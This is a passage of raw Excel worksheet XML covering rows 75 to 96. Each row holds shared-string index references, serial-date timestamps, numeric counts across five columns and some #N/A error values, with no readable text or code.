      <c r="I75" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J75" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K75" s="3" t="s">
        <v>575</v>
      </c>
      <c r="L75" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M75" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N75" s="1"/>
      <c r="O75" s="1"/>
      <c r="P75" s="1"/>
      <c r="Q75" s="1" t="s">
        <v>3518</v>
      </c>
      <c r="R75" s="83">
        <v>25</v>
      </c>
      <c r="S75" s="83">
        <v>7</v>
      </c>
      <c r="T75" s="83">
        <v>1</v>
      </c>
      <c r="U75" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V75" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W75" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="76" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A76" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B76" s="51">
        <v>44405.670701782408</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D76" s="43">
        <v>120</v>
      </c>
      <c r="E76" s="1" t="s">
        <v>1193</v>
      </c>
      <c r="F76" s="26">
        <v>120</v>
      </c>
      <c r="G76" s="1" t="s">
        <v>1194</v>
      </c>
      <c r="H76" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I76" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J76" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K76" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L76" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M76" s="1" t="s">
        <v>1195</v>
      </c>
      <c r="N76" s="1"/>
      <c r="O76" s="1" t="s">
        <v>1196</v>
      </c>
      <c r="P76" s="1"/>
      <c r="Q76" s="1" t="s">
        <v>3519</v>
      </c>
      <c r="R76" s="83">
        <v>15067</v>
      </c>
      <c r="S76" s="83">
        <v>13821</v>
      </c>
      <c r="T76" s="83">
        <v>12778</v>
      </c>
      <c r="U76" s="83">
        <v>12994</v>
      </c>
      <c r="V76" s="83">
        <v>13343</v>
      </c>
      <c r="W76" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="77" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A77" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B77" s="51">
        <v>44405.670701932868</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D77" s="43">
        <v>120</v>
      </c>
      <c r="E77" s="1" t="s">
        <v>1198</v>
      </c>
      <c r="F77" s="26">
        <v>100</v>
      </c>
      <c r="G77" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="H77" s="1" t="s">
        <v>1200</v>
      </c>
      <c r="I77" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J77" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K77" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L77" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M77" s="1" t="s">
        <v>76</v>
      </c>
      <c r="N77" s="1"/>
      <c r="O77" s="1" t="s">
        <v>1201</v>
      </c>
      <c r="P77" s="1"/>
      <c r="Q77" s="1" t="s">
        <v>3519</v>
      </c>
      <c r="R77" s="83">
        <v>15064</v>
      </c>
      <c r="S77" s="83">
        <v>13821</v>
      </c>
      <c r="T77" s="83">
        <v>12772</v>
      </c>
      <c r="U77" s="83">
        <v>12993</v>
      </c>
      <c r="V77" s="83">
        <v>13357</v>
      </c>
      <c r="W77" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="78" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A78" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B78" s="51">
        <v>44405.670701817129</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D78" s="43">
        <v>120</v>
      </c>
      <c r="E78" s="1" t="s">
        <v>1202</v>
      </c>
      <c r="F78" s="26">
        <v>100</v>
      </c>
      <c r="G78" s="1" t="s">
        <v>1203</v>
      </c>
      <c r="H78" s="1" t="s">
        <v>1204</v>
      </c>
      <c r="I78" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J78" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K78" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L78" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M78" s="1" t="s">
        <v>76</v>
      </c>
      <c r="N78" s="1"/>
      <c r="O78" s="1" t="s">
        <v>1205</v>
      </c>
      <c r="P78" s="1"/>
      <c r="Q78" s="1" t="s">
        <v>3519</v>
      </c>
      <c r="R78" s="83">
        <v>15066</v>
      </c>
      <c r="S78" s="83">
        <v>13811</v>
      </c>
      <c r="T78" s="83">
        <v>12793</v>
      </c>
      <c r="U78" s="83">
        <v>12984</v>
      </c>
      <c r="V78" s="83">
        <v>13372</v>
      </c>
      <c r="W78" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="79" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A79" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B79" s="51">
        <v>44341.743694837962</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D79" s="43">
        <v>120</v>
      </c>
      <c r="E79" s="1" t="s">
        <v>1206</v>
      </c>
      <c r="F79" s="26">
        <v>100</v>
      </c>
      <c r="G79" s="1" t="s">
        <v>1207</v>
      </c>
      <c r="H79" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I79" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J79" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K79" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L79" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M79" s="1" t="s">
        <v>76</v>
      </c>
      <c r="N79" s="1"/>
      <c r="O79" s="1" t="s">
        <v>1208</v>
      </c>
      <c r="P79" s="1"/>
      <c r="Q79" s="1" t="s">
        <v>3519</v>
      </c>
      <c r="R79" s="83">
        <v>15062</v>
      </c>
      <c r="S79" s="83">
        <v>13823</v>
      </c>
      <c r="T79" s="83">
        <v>12776</v>
      </c>
      <c r="U79" s="83">
        <v>12982</v>
      </c>
      <c r="V79" s="83">
        <v>13376</v>
      </c>
      <c r="W79" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="80" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A80" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B80" s="51">
        <v>44405.670701736111</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D80" s="43">
        <v>120</v>
      </c>
      <c r="E80" s="1" t="s">
        <v>1214</v>
      </c>
      <c r="F80" s="26">
        <v>120</v>
      </c>
      <c r="G80" s="1" t="s">
        <v>1215</v>
      </c>
      <c r="H80" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I80" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J80" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K80" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L80" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M80" s="1"/>
      <c r="N80" s="1"/>
      <c r="O80" s="1"/>
      <c r="P80" s="1"/>
      <c r="Q80" s="1" t="s">
        <v>3519</v>
      </c>
      <c r="R80" s="83">
        <v>15066</v>
      </c>
      <c r="S80" s="83">
        <v>13821</v>
      </c>
      <c r="T80" s="83">
        <v>12769</v>
      </c>
      <c r="U80" s="83">
        <v>12984</v>
      </c>
      <c r="V80" s="83">
        <v>13338</v>
      </c>
      <c r="W80" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="81" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A81" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B81" s="51">
        <v>44663.366533622684</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>1220</v>
      </c>
      <c r="D81" s="43">
        <v>100</v>
      </c>
      <c r="E81" s="1" t="s">
        <v>1221</v>
      </c>
      <c r="F81" s="26">
        <v>100</v>
      </c>
      <c r="G81" s="57" t="s">
        <v>1222</v>
      </c>
      <c r="H81" s="1" t="s">
        <v>1223</v>
      </c>
      <c r="I81" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J81" s="1" t="s">
        <v>454</v>
      </c>
      <c r="K81" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L81" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M81" s="1" t="s">
        <v>76</v>
      </c>
      <c r="N81" s="1"/>
      <c r="O81" s="1"/>
      <c r="P81" s="1"/>
      <c r="Q81" s="1" t="s">
        <v>1224</v>
      </c>
      <c r="R81" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S81" s="83">
        <v>6</v>
      </c>
      <c r="T81" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U81" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V81" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W81" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="82" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A82" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B82" s="51">
        <v>44265.584430173614</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>1225</v>
      </c>
      <c r="D82" s="43">
        <v>203</v>
      </c>
      <c r="E82" s="1" t="s">
        <v>1226</v>
      </c>
      <c r="F82" s="26">
        <v>203</v>
      </c>
      <c r="G82" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="H82" s="1" t="s">
        <v>1228</v>
      </c>
      <c r="I82" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J82" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K82" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L82" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M82" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N82" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O82" s="1" t="s">
        <v>1229</v>
      </c>
      <c r="P82" s="1"/>
      <c r="Q82" s="1" t="s">
        <v>3520</v>
      </c>
      <c r="R82" s="83">
        <v>639145</v>
      </c>
      <c r="S82" s="83">
        <v>506982</v>
      </c>
      <c r="T82" s="83">
        <v>486266</v>
      </c>
      <c r="U82" s="83">
        <v>561137</v>
      </c>
      <c r="V82" s="83">
        <v>689546</v>
      </c>
      <c r="W82" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="83" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A83" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B83" s="51">
        <v>44445.617869374997</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>1237</v>
      </c>
      <c r="D83" s="43">
        <v>101</v>
      </c>
      <c r="E83" s="1" t="s">
        <v>1232</v>
      </c>
      <c r="F83" s="26">
        <v>101</v>
      </c>
      <c r="G83" s="1" t="s">
        <v>1233</v>
      </c>
      <c r="H83" s="1" t="s">
        <v>1234</v>
      </c>
      <c r="I83" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J83" s="1" t="s">
        <v>1238</v>
      </c>
      <c r="K83" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L83" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M83" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N83" s="1" t="s">
        <v>174</v>
      </c>
      <c r="O83" s="1" t="s">
        <v>1235</v>
      </c>
      <c r="P83" s="1"/>
      <c r="Q83" s="1" t="s">
        <v>3521</v>
      </c>
      <c r="R83" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S83" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T83" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U83" s="83">
        <v>2</v>
      </c>
      <c r="V83" s="83">
        <v>2</v>
      </c>
      <c r="W83" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="84" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A84" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B84" s="51">
        <v>44312.455104699075</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>1246</v>
      </c>
      <c r="D84" s="43">
        <v>113</v>
      </c>
      <c r="E84" s="1" t="s">
        <v>1247</v>
      </c>
      <c r="F84" s="26">
        <v>113</v>
      </c>
      <c r="G84" s="1" t="s">
        <v>1248</v>
      </c>
      <c r="H84" s="1" t="s">
        <v>89</v>
      </c>
      <c r="I84" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J84" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K84" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L84" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M84" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N84" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O84" s="1"/>
      <c r="P84" s="1"/>
      <c r="Q84" s="1" t="s">
        <v>3522</v>
      </c>
      <c r="R84" s="83">
        <v>93076</v>
      </c>
      <c r="S84" s="83">
        <v>154858</v>
      </c>
      <c r="T84" s="83">
        <v>42180102</v>
      </c>
      <c r="U84" s="83">
        <v>41278649</v>
      </c>
      <c r="V84" s="83">
        <v>50537375</v>
      </c>
      <c r="W84" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="85" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A85" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B85" s="51">
        <v>44312.455104687499</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>1246</v>
      </c>
      <c r="D85" s="43">
        <v>113</v>
      </c>
      <c r="E85" s="1" t="s">
        <v>1250</v>
      </c>
      <c r="F85" s="26">
        <v>113</v>
      </c>
      <c r="G85" s="1" t="s">
        <v>1251</v>
      </c>
      <c r="H85" s="1" t="s">
        <v>110</v>
      </c>
      <c r="I85" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J85" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K85" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L85" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M85" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N85" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O85" s="1"/>
      <c r="P85" s="1"/>
      <c r="Q85" s="1" t="s">
        <v>3522</v>
      </c>
      <c r="R85" s="83">
        <v>2692855</v>
      </c>
      <c r="S85" s="83">
        <v>2555186</v>
      </c>
      <c r="T85" s="83">
        <v>2555180</v>
      </c>
      <c r="U85" s="83">
        <v>2680531</v>
      </c>
      <c r="V85" s="83">
        <v>3143115</v>
      </c>
      <c r="W85" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="86" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A86" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B86" s="51">
        <v>44504.458599166668</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>1252</v>
      </c>
      <c r="D86" s="43">
        <v>110</v>
      </c>
      <c r="E86" s="1" t="s">
        <v>1253</v>
      </c>
      <c r="F86" s="26">
        <v>110</v>
      </c>
      <c r="G86" s="1" t="s">
        <v>1254</v>
      </c>
      <c r="H86" s="1" t="s">
        <v>1255</v>
      </c>
      <c r="I86" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J86" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K86" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L86" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M86" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N86" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O86" s="1"/>
      <c r="P86" s="1"/>
      <c r="Q86" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R86" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S86" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T86" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U86" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V86" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W86" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="87" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A87" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B87" s="51">
        <v>44434.635436087963</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>1259</v>
      </c>
      <c r="D87" s="43">
        <v>100</v>
      </c>
      <c r="E87" s="1" t="s">
        <v>1260</v>
      </c>
      <c r="F87" s="26">
        <v>100</v>
      </c>
      <c r="G87" s="1" t="s">
        <v>1261</v>
      </c>
      <c r="H87" s="1" t="s">
        <v>1262</v>
      </c>
      <c r="I87" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J87" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K87" s="49" t="s">
        <v>13</v>
      </c>
      <c r="L87" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M87" s="49" t="s">
        <v>1256</v>
      </c>
      <c r="N87" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O87" s="1"/>
      <c r="P87" s="1"/>
      <c r="Q87" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R87" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S87" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T87" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U87" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V87" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W87" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="88" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A88" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B88" s="52">
        <v>44474.396612256947</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>1263</v>
      </c>
      <c r="D88" s="43">
        <v>101</v>
      </c>
      <c r="E88" s="1" t="s">
        <v>1264</v>
      </c>
      <c r="F88" s="26">
        <v>101</v>
      </c>
      <c r="G88" s="1" t="s">
        <v>1265</v>
      </c>
      <c r="H88" s="1" t="s">
        <v>1266</v>
      </c>
      <c r="I88" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J88" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K88" s="49" t="s">
        <v>13</v>
      </c>
      <c r="L88" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M88" s="49" t="s">
        <v>1256</v>
      </c>
      <c r="N88" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O88" s="1"/>
      <c r="P88" s="1"/>
      <c r="Q88" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R88" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S88" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T88" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U88" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V88" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W88" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="89" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A89" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B89" s="51">
        <v>44434.619034537034</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>1267</v>
      </c>
      <c r="D89" s="43">
        <v>100</v>
      </c>
      <c r="E89" s="1" t="s">
        <v>1268</v>
      </c>
      <c r="F89" s="26">
        <v>100</v>
      </c>
      <c r="G89" s="1" t="s">
        <v>1269</v>
      </c>
      <c r="H89" s="1" t="s">
        <v>1270</v>
      </c>
      <c r="I89" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J89" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K89" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L89" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M89" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N89" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O89" s="1"/>
      <c r="P89" s="1"/>
      <c r="Q89" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R89" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S89" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T89" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U89" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V89" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W89" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="90" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A90" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B90" s="51">
        <v>44445.61456603009</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>1263</v>
      </c>
      <c r="D90" s="43">
        <v>101</v>
      </c>
      <c r="E90" s="1" t="s">
        <v>1271</v>
      </c>
      <c r="F90" s="26">
        <v>100</v>
      </c>
      <c r="G90" s="1" t="s">
        <v>1272</v>
      </c>
      <c r="H90" s="1" t="s">
        <v>1273</v>
      </c>
      <c r="I90" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J90" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K90" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L90" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M90" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N90" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O90" s="1"/>
      <c r="P90" s="1"/>
      <c r="Q90" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R90" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S90" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T90" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U90" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V90" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W90" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="91" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A91" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B91" s="51">
        <v>44434.635436111108</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>1259</v>
      </c>
      <c r="D91" s="43">
        <v>100</v>
      </c>
      <c r="E91" s="1" t="s">
        <v>1274</v>
      </c>
      <c r="F91" s="26">
        <v>100</v>
      </c>
      <c r="G91" s="1" t="s">
        <v>1275</v>
      </c>
      <c r="H91" s="1" t="s">
        <v>1276</v>
      </c>
      <c r="I91" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J91" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K91" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L91" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M91" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N91" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O91" s="1"/>
      <c r="P91" s="1"/>
      <c r="Q91" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R91" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S91" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T91" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U91" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V91" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W91" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="92" spans="1:23" ht="15" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A92" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B92" s="51">
        <v>44504.458599155092</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>1252</v>
      </c>
      <c r="D92" s="43">
        <v>110</v>
      </c>
      <c r="E92" s="1" t="s">
        <v>1277</v>
      </c>
      <c r="F92" s="26">
        <v>110</v>
      </c>
      <c r="G92" s="1" t="s">
        <v>1278</v>
      </c>
      <c r="H92" s="1" t="s">
        <v>1279</v>
      </c>
      <c r="I92" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J92" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K92" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L92" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M92" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N92" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O92" s="1"/>
      <c r="P92" s="1"/>
      <c r="Q92" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R92" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S92" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T92" s="83">
        <v>1</v>
      </c>
      <c r="U92" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V92" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W92" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="93" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A93" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B93" s="51">
        <v>44504.458599178244</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>1252</v>
      </c>
      <c r="D93" s="43">
        <v>110</v>
      </c>
      <c r="E93" s="1" t="s">
        <v>1280</v>
      </c>
      <c r="F93" s="26">
        <v>110</v>
      </c>
      <c r="G93" s="1" t="s">
        <v>1281</v>
      </c>
      <c r="H93" s="1" t="s">
        <v>1282</v>
      </c>
      <c r="I93" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J93" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K93" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L93" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M93" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N93" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O93" s="1"/>
      <c r="P93" s="1"/>
      <c r="Q93" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R93" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S93" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T93" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U93" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V93" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W93" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="94" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A94" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B94" s="51">
        <v>44434.61903454861</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>1267</v>
      </c>
      <c r="D94" s="43">
        <v>100</v>
      </c>
      <c r="E94" s="1" t="s">
        <v>1283</v>
      </c>
      <c r="F94" s="26">
        <v>100</v>
      </c>
      <c r="G94" s="1" t="s">
        <v>1284</v>
      </c>
      <c r="H94" s="1" t="s">
        <v>1285</v>
      </c>
      <c r="I94" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J94" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K94" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L94" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M94" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="N94" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="O94" s="1"/>
      <c r="P94" s="1"/>
      <c r="Q94" s="1" t="s">
        <v>1258</v>
      </c>
      <c r="R94" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S94" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T94" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U94" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V94" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W94" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="95" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A95" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B95" s="51">
        <v>44016.919070185184</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D95" s="43">
        <v>104</v>
      </c>
      <c r="E95" s="1" t="s">
        <v>1287</v>
      </c>
      <c r="F95" s="26">
        <v>102</v>
      </c>
      <c r="G95" s="1" t="s">
        <v>1288</v>
      </c>
      <c r="H95" s="1" t="s">
        <v>1289</v>
      </c>
      <c r="I95" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J95" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K95" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L95" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M95" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N95" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O95" s="1" t="s">
        <v>1290</v>
      </c>
      <c r="P95" s="1" t="s">
        <v>272</v>
      </c>
      <c r="Q95" s="1" t="s">
        <v>3523</v>
      </c>
      <c r="R95" s="83">
        <v>94742</v>
      </c>
      <c r="S95" s="83">
        <v>103735</v>
      </c>
      <c r="T95" s="83">
        <v>96125</v>
      </c>
      <c r="U95" s="83">
        <v>105138</v>
      </c>
      <c r="V95" s="83">
        <v>120505</v>
      </c>
      <c r="W95" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="96" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A96" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B96" s="51">
        <v>44081.616353287034</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="D96" s="26">
        <v>101</v>
      </c>
      <c r="E96" s="1" t="s">
        <v>1287</v>
      </c>
      <c r="F96" s="26">
